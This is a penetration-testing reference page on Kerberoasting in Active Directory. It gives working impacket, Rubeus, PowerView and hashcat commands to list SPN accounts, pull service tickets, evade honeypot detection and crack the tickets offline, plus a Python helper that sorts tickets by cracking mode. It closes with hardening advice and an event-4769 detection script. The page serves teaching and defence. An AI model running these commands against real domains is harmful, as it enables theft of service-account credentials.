Kerberoasting

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

This attack targets domain accounts that have a Service Principal Name (SPN) set. Any authenticated domain user can legitimately ask the KDC for a Kerberos service ticket (TGS) for any SPN; no special privilege is needed and the request itself is indistinguishable from a client about to use the service.

A service ticket is encrypted with the long-term key of the account that owns the SPN, and that key is derived from the account's password (the NT hash for RC4, a PBKDF2-derived key for AES). Because the KDC hands the encrypted ticket to the requester, it can be taken offline and password candidates tried until one produces a key that decrypts it correctly. Kerberoasting is that offline guessing attack: the "hash" the tools output is the encrypted part of the ticket, not a password hash read from the directory, and it is only as strong as the service account's password. Computer accounts also carry SPNs but are not practical targets, since their passwords are long, random and rotated automatically.

Prerequisites

  • Low privileged domain account.
  • Target must be a domain account with a Service Principal Name (SPN) associated.

Exploit

First, identify domain users with an SPN. Kerberoastable users can be listed in several ways, for instance:

# From Kali.
impacket-GetUserSPNs -dc-ip $dc_ip $domain/$username:$password

# From a domain joined computer with PowerView.
Get-NetUser -SPN

# From a domain joined computer with the ActiveDirectory PowerShell module.
Get-ADUser -Filter { ServicePrincipalName -ne "$null" } -Properties ServicePrincipalName

# With ADSearch.
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

The following commands request a service ticket (TGS-REP) for every Kerberoastable account and save the encrypted part of each ticket, formatted as a $krb5tgs$ line that hashcat understands, in the output file.

# From Kali (without -outputfile the hashes are printed to stdout).
impacket-GetUserSPNs -request -dc-ip $dc_ip $domain/$username:$password -outputfile kerberoast.out

# From a domain joined computer.
.\Rubeus.exe kerberoast /outfile:kerberoast.out

# From a Windows computer not joined to the domain.
.\Rubeus.exe kerberoast /creduser:$domain\$username /credpassword:$password /domain:$domain /dc:$dc_ip /outfile:kerberoast.out

Requesting tickets for every SPN at once is noisy and will also touch honeypot accounts whose only purpose is to detect this sweep. To be more stealthy, request one target at a time: add /user:$target with Rubeus, or -request-user $target with impacket-GetUserSPNs. Both tools show when each account's password was last set; accounts with old passwords or real privileges are the ones worth the cracking time.

Then crack the retrieved $krb5tgs$ lines with hashcat. Mode 13100 is for RC4 tickets (lines starting with $krb5tgs$23$), which is what the tools request by default. If an account only supports AES, the line starts with $krb5tgs$17$ (AES128, mode 19600) or $krb5tgs$18$ (AES256, mode 19700) and cracking is far slower, because every candidate password goes through PBKDF2 before the ticket can be checked.

# --force only bypasses driver warnings; drop it when hashcat starts cleanly.
hashcat -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
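As an added example, not taken from this page or from impacket, Rubeus or hashcat, the Python below reproduces the $krb5tgs$ line layout those tools write (the "hash" is the ticket's encrypted part with its checksum split off), parses such lines back, and sorts a mixed output file into the hashcat modes above so that RC4 and AES tickets are not fed to the wrong mode. The account names, SPNs and cipher bytes are constructed stand-ins, not real tickets.

```python
import re
from collections import defaultdict

# Encryption type of the ticket's enc-part, and the hashcat mode that cracks it.
ETYPE_TO_HASHCAT = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# RC4 line as written by impacket/Rubeus:
#   $krb5tgs$23$*user$REALM$spn*$<16-byte checksum hex>$<edata hex>
RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*([^$*]+)\$([^$*]+)\$([^$*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$", re.I)
# AES line:
#   $krb5tgs$17|18$user$REALM$*spn*$<12-byte checksum hex>$<edata hex>
AES_RE = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$*]+)\$([^$*]+)\$\*([^$*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$", re.I)


def format_hash(etype, user, realm, spn, cipher):
    """Lay out the raw enc-part bytes of a service ticket the way the tools do.

    RC4 (etype 23): the HMAC-MD5 checksum is the first 16 bytes of the blob.
    AES (etype 17/18): the HMAC-SHA1-96 checksum is the last 12 bytes.
    A ':' in a port-bearing SPN becomes '~' so it cannot clash with field separators.
    """
    spn = spn.replace(":", "~")
    if etype == 23:
        checksum, edata = cipher[:16], cipher[16:]
        return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"
    if etype in (17, 18):
        checksum, edata = cipher[-12:], cipher[:-12]
        return f"$krb5tgs${etype}${user}${realm}$*{spn}*${checksum.hex()}${edata.hex()}"
    raise ValueError(f"unsupported etype {etype}")


def parse_hash(line):
    """Parse one $krb5tgs$ line (user accounts only: the regexes reject '$' inside names)."""
    m = RC4_RE.match(line)
    if m:
        etype = 23
        user, realm, spn, checksum, edata = m.groups()
    else:
        m = AES_RE.match(line)
        if not m:
            return None
        etype_str, user, realm, spn, checksum, edata = m.groups()
        etype = int(etype_str)
    return {
        "etype": etype,
        "etype_name": ETYPE_NAME[etype],
        "hashcat_mode": ETYPE_TO_HASHCAT[etype],
        "user": user,
        "realm": realm,
        "spn": spn,
        "checksum": checksum.lower(),
        "edata": edata.lower(),
    }


def split_by_mode(lines):
    """Group lines by hashcat mode; anything that is not a $krb5tgs$ line is dropped."""
    groups = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        parsed = parse_hash(line)
        if parsed is not None:
            groups[parsed["hashcat_mode"]].append(line)
    return dict(groups)


def hashcat_commands(groups, wordlist="/usr/share/wordlists/rockyou.txt",
                     rules="/usr/share/hashcat/rules/best64.rule"):
    """One hashcat invocation per mode, assuming each group was written to krb5tgs_<mode>.txt."""
    return [f"hashcat -m {mode} krb5tgs_{mode}.txt {wordlist} -r {rules}" for mode in sorted(groups)]


if __name__ == "__main__":
    # Constructed sample: deterministic stand-in for a ticket's enc-part bytes.
    sample_cipher = bytes(range(64))
    rc4_line = format_hash(23, "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", sample_cipher)
    aes_line = format_hash(18, "svc_web", "CORP.LOCAL", "HTTP/web01.corp.local", sample_cipher)
    for mode, lines in split_by_mode([rc4_line, aes_line, "not a hash"]).items():
        print(mode, [parse_hash(entry)["spn"] for entry in lines])
    print("\n".join(hashcat_commands(split_by_mode([rc4_line, aes_line]))))
```

Run it against a real kerberoast.out by feeding the file's lines to split_by_mode and writing each group to its own file; the checksum split is the reason a line whose etype does not match the -m value is rejected by hashcat rather than silently failing to crack.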

Recommendations

  • Remove the Service Principal Name (SPN) from user accounts that do not need one, and run services under group Managed Service Accounts (gMSA) where possible: their passwords are long, random and rotated automatically, so a captured ticket is useless.
  • If a regular user account with an SPN cannot be avoided, give it a long random password (25 characters or more) so the offline guess is impractical, and strip privileges it does not need; a cracked service account that is also Domain Admin is the real damage.
  • Restrict those accounts to AES (msDS-SupportedEncryptionTypes) so the KDC never issues an RC4 ticket for them; AES tickets are far slower to crack, and reset the password once afterwards if it predates AES support so the account actually has AES keys.
  • Monitor Security event 4769 on domain controllers: many service-ticket requests from one account in a short time, especially with Ticket Encryption Type 0x17 (RC4) for user accounts, is the signature of a Kerberoast sweep. A decoy account with an attractive SPN that no legitimate client ever uses turns any request for it into a high-confidence alert.
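As an added example of the monitoring recommendation, not part of the original page, the Python below runs the fan-out rule over a constructed batch of event 4769 records: a requester that obtains RC4 service tickets for several distinct user SPNs within a few minutes is flagged, while computer-account and krbtgt tickets, failed requests and ordinary single-service use are ignored. The field names, account names and timestamps are invented for the sample; map them from your SIEM's 4769 schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket Encryption Type values as logged in Security event 4769.
RC4_HMAC = 0x17
AES128 = 0x11
AES256 = 0x12

# Constructed sample of 4769 records (account = Account Name, service = Service Name,
# etype = Ticket Encryption Type, status = Failure Code, 0x0 meaning success).
# Not real log data.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "account": "jdoe@CORP.LOCAL", "service": "svc_sql", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.25"},
    {"time": "2024-05-01T09:00:01", "account": "jdoe@CORP.LOCAL", "service": "svc_web", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.25"},
    {"time": "2024-05-01T09:00:02", "account": "jdoe@CORP.LOCAL", "service": "svc_backup", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.25"},
    {"time": "2024-05-01T09:00:02", "account": "jdoe@CORP.LOCAL", "service": "WS01$", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.25"},
    {"time": "2024-05-01T09:00:03", "account": "jdoe@CORP.LOCAL", "service": "svc_iis", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.25"},
    {"time": "2024-05-01T09:00:03", "account": "jdoe@CORP.LOCAL", "service": "svc_old", "etype": RC4_HMAC, "status": 0x12, "client": "10.0.0.25"},
    # Normal activity: an AES ticket for one service, a computer-account ticket, a TGT renewal.
    {"time": "2024-05-01T09:01:10", "account": "asmith@CORP.LOCAL", "service": "svc_sql", "etype": AES256, "status": 0x0, "client": "10.0.0.40"},
    {"time": "2024-05-01T09:01:11", "account": "asmith@CORP.LOCAL", "service": "FS01$", "etype": RC4_HMAC, "status": 0x0, "client": "10.0.0.40"},
    {"time": "2024-05-01T09:30:00", "account": "asmith@CORP.LOCAL", "service": "krbtgt", "etype": AES256, "status": 0x0, "client": "10.0.0.40"},
]


def kerberoast_alerts(events, threshold=3, window=timedelta(minutes=5), rc4_only=True):
    """Flag accounts that obtain service tickets for many distinct user SPNs in a short window.

    Computer accounts (names ending in '$') and krbtgt are ignored: their tickets are
    routine and their keys are not crackable. With rc4_only=True only RC4 tickets count,
    which is what Kerberoast tooling requests by default; set it False in AES-only domains
    and rely on the fan-out count alone.
    """
    per_account = defaultdict(list)
    for ev in events:
        if ev["status"] != 0x0:
            continue
        if rc4_only and ev["etype"] != RC4_HMAC:
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), svc))

    alerts = []
    for account, requests in per_account.items():
        requests.sort()
        # Slide a window over the sorted requests and count distinct services in it.
        for i, (start, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts.append({"account": account, "first_seen": start.isoformat(),
                               "services": sorted(services)})
                break  # one alert per account is enough
    return alerts


if __name__ == "__main__":
    for alert in kerberoast_alerts(SAMPLE_4769):
        print(f"{alert['account']} requested {len(alert['services'])} user SPNs from {alert['first_seen']}: {alert['services']}")
```

Tune threshold and window to the baseline of your own domain; a decoy SPN account needs no threshold at all, since a single 4769 naming it is already actionable.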